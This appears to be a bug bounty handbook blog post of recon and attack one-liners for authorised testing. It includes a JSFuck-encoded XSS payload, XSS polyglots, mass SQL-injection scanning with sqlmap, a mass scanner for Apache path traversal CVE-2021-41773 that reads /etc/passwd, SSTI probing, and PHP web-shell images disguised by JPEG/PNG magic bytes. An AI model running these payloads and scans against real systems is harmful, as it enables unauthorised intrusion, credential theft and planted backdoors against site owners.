Post

Bug Bounty Notes

Posted
By Kasem Shibli
6 min read
Bug Bounty Notes

Bug Bounty Handbook

Table of Contents

Resources

NameDescriptionURL
Bug CrowdBug Bounty Platformhttps://www.bugcrowd.com
CrowdStreamCrowdStream is a showcase of accepted and disclosed submissions on participating programs.https://bugcrowd.com/crowdstream?filter=disclosures
disclose.ioWe’re here to make vulnerability disclosure safe, simple, and standardized for everyone.https://disclose.io
HackerOneBug Bounty Platformhttps://www.hackerone.com
HacktivitySee the latest hacker activity on HackerOnehttps://hackerone.com/hacktivity
InfoSecHubn/ahttps://linksshare.io
IntigritiBug Bounty Platformhttps://www.intigriti.com

Automated Subdomain Monitoring

https://github.com/hakluke/haktrails

https://github.com/tomnomnom/anew

https://github.com/projectdiscovery/notify

Installation

$ go install -v github.com/hakluke/haktrails@latest $ go install -v github.com/tomnomnom/anew@latest $ go install -v github.com/projectdiscovery/notify/cmd/notify@latest

Configuration

haktrails

$ vi ~/.config/haktools/haktrails-config.yml
securitytrails: key: <API_KEY>

Notify

$ vi ~/.config/notify/provider-config.yaml
slack: - id: "slack" slack_channel: "recon" slack_username: "test" slack_format: "" slack_webhook_url: "https://hooks.slack.com/services/XXXXXX" - id: "vulns" slack_channel: "vulns" slack_username: "test" slack_format: "" slack_webhook_url: "https://hooks.slack.com/services/XXXXXX" discord: - id: "crawl" discord_channel: "crawl" discord_username: "test" discord_format: "" discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX" - id: "subs" discord_channel: "subs" discord_username: "test" discord_format: "" discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX" telegram: - id: "tel" telegram_api_key: "XXXXXXXXXXXX" telegram_chat_id: "XXXXXXXX" telegram_format: "" telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options) pushover: - id: "push" pushover_user_key: "XXXX" pushover_api_token: "YYYY" pushover_format: "" pushover_devices: - "iphone" smtp: - id: email smtp_server: mail.example.com smtp_username: test@example.com smtp_password: password from_address: from@email.com smtp_cc: - to@email.com smtp_format: "" subject: "Email subject" smtp_html: false smtp_disable_starttls: false googlechat: - id: "gc" key: "XXXXXXXX" token: "XXXXXX" space: "XXXXXX" google_chat_format: "" teams: - id: "recon" teams_webhook_url: "https://<domain>.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx" teams_format: "" custom: - id: webhook custom_webhook_url: http://host/api/webhook custom_method: GET custom_format: '' custom_headers: Content-Type: application/json X-Api-Key: XXXXX custom: - id: webhookJson custom_webhook_url: http://host/api/webhook custom_method: GET custom_format: '{"text": }' custom_headers: Content-Type: application/json X-Api-Key: XXXXX custom: - id: webhook custom_webhook_url: http://host/api/webhook custom_method: GET custom_sprig: '{"text":""}' custom_headers: Content-Type: application/json X-Api-Key: XXXXX

Monitoring Oneliner

$ while :; do echo <DOMAIN> | haktrails subdomain | anew subdomains.txt; sleep 86400; done | notify

Burp Suite Extensions

  • JS Link Finder
  • Upload Scanner
  • Turbo Intruder
  • HTTP Request Smuggler
  • Auth Analyzer

JavaScript

JSFuck

http://www.jsfuck.com/

https://github.com/aemkei/jsfuck

https://github.com/aemkei/jsfuck/blob/master/jsfuck.js

![] // false !![] // true [][[]] // undefined +[![]] // NaN +[] // 0 +!+[] // 1 !+[]+!+[] // 2 [] // Array +[] // Number []+[] // String ![] // Boolean []["filter"] // Function []["filter"]["constructor"]( <CODE> )() // eval []["filter"]["constructor"]("<FOOBAR>")() // window

Encoded Payload

<img src onerror="(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[]) [+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]++[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]]">

Enumerate Subdomains, Web Servers and API Endpoints

$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; for i in $(cat <DOMAIN>_httpx.txt); do DOMAIN=$(echo $i | /home/<USERNAME>/go/bin/unfurl format %d); ffuf -u $i/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt -o ${DOMAIN}_ffuf.txt; done

Find CNAME Records

$ for ip in $(cat <FILE>.txt); do dig asxf %ip | grep CNAME; done

Find hidden Parameters in JavaScript Files

$ assetfinder <DOMAIN> | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"

Find JavaScript Files with gau and httpx

$ echo http://<DOMAIN> | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'

Find Open Redirects

$ echo "http://<RHOST>" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"

Find Secrets in JavaScript Files

$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; for i in $(cat <DOMAIN>_httpx.txt); do DOMAIN=$(echo $i | /home/<USERNAME>/go/bin/unfurl format %d) | cat <DOMAIN>_httpx.txt | nuclei -t /home/<USERNAME>/opt/03_web_application_analysis/nuclei-templates/exposures/tokens -o token-expose.txt; done

Find Subdomains based on Certificates

$ curl -s https://crt.sh/\?q\=<DOMAIN>\&output\=json | jq . | grep 'name_value' | awk '{print $2}' | sed -e 's/"//g'| sed -e 's/,//g' | awk '{gsub(/\\n/,"\n")}1' | sort -u

Find SQL-Injection (SQLi) at Scale

$ subfinder -d <DOMAIN> -silent -all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a <FILE> $ cat <FILE> | gf sqli | tee -a <FILE> $ while read line; do sqlmap -u $line --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3; done < <FILE>

Find basic SQL-Injection (SQLi), Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) Vulnerabilities with Magic Payload

'"><svg/onload=alert()>

Find Cross-Site Scripting (XSS) at Scale

XSStrike

https://github.com/s0md3v/XSStrike

https://github.com/lc/gau

https://github.com/projectdiscovery/katana

$ echo <DOMAIN> | gau | while read url; do python3 xsstrike.py -u $url --crawl -l 4 -d 5; done $ echo <DOMAIN> | katana | while read url; do python3 xsstrike.py -u $url --crawl -l 4; done
$ subfinder -d <DOMAIN> -all -silent | httpx -silent | katana -silent | Gxss -c 100 | dalfox pipe --skip-bav --skip-mining-all --skip-grepping

Fingerprinting with Shodan and Nuclei

$ shodan domain <DOMAIN> | awk '{print $3}' | httpx -silent | nuclei -t /PATH/TO/TEMPLATES/nuclei-templates/

Hunting Checklist

Domains

  1. Find Subdomains
  2. Check CNAME Records of those subdomains and check for Subdomain Takeover
    • Use WaybackUrls for URLs
  3. Use MassScan for Port Scanning
  4. Do Github recon

Web Applications

  1. Check for CORS Misconfiguration
  2. Check for Email Header Injection on Password Reset Function
  3. Check for SMTP and HOST Header Injection
  4. Check for IFRAMEs (Clickjacking)
  5. Check for Improper Access Control and Paramter Tampering
  6. Check Burp History for finding endpoint
  7. Use Arjun for finding hidden endpoints
  8. Check for Client-Side Request Forgery (CSRF)
  9. Check for Server-Side Request Forgery (SSRF) Parameters
  10. Check for Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI)
  11. Check Cryptography in Reset Password Token
  12. Check for Unicode Injection in Email Parameters
  13. Check for Bypassing Rate Limits

Headers

X-Originating-IP:IP X-Forwarded-For:IP X-Remote-IP:IP X-Remote-Addr:IP X-Client-IP:IP X-Forwarded-Host:IP

  1. Perform Directory Busting
  2. Check for HTTP Request Smuggling
  3. Check for Open Redirect through WaybackUrls
  4. Check for Social-Signon Bypass
  5. Check for state parameter in Social Sign-In & check whether it’s possible to cause Denial of Service (DoS) using Multiple Cookie Injection
  6. Check for File Upload: CSRF, XSS, SSRF, RCE, LFI, XXE
  7. Check for Buffer Overflow

Path Traversal Zero-Day in Apache HTTP Server (CVE-2021-41773)

$ cat <FILE>.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

Server-Side Template Injection (SSTI) at Scale

$ echo "<DOMAIN>" | subfinder -silent | waybackurls | gf ssti | qsreplace "" | parallel -j50 -q curl -g | grep "root:x"

Wayback Machine

  1. Access https://web.archive.org/
  2. Type in the desired domain
  3. Switch to the URL tab https://web.archive.org/web/*/https://*
  4. Apply the filter %40

waybackurls

https://github.com/tomnomnom/waybackurls

$ waybackurls <DOMAIN> | grep - -color -E "1.xls | \\.tar.gz | \\.bak | \\.xml | \\.xlsx | \\.json | \\.rar | \\.pdf | \\.sql | \\.doc | \\.docx | \\.pptx | \\.txt | \\.zip | \\.tgz | \\.7z"

Web Shell / Malicious Images

$ echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > <FILE>.jpg $ echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > <FILE>.png

Wordpress Configuration Disclosure

$ subfinder -silent -d http://<DOMAIN> | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60

Cross-Site Scripting (XSS)

Ployglot Payload

Note that HTML tags that need to be closed for XSS.

<!-- <title> <textarea> <style> <noscript> <xmp> <template> <noembed>
--></title></textarea></style></noscript></script></xmp></template></noembed><svg/onload=alert()>

Single Domain One-liner

$ echo https://<DOMAIN>/ | gau | gf xss | uro | Gxss | kxss | tee <FILE>.txt
Notes, BugBounty
BugBounty
This post is licensed under CC BY 4.0 by the author.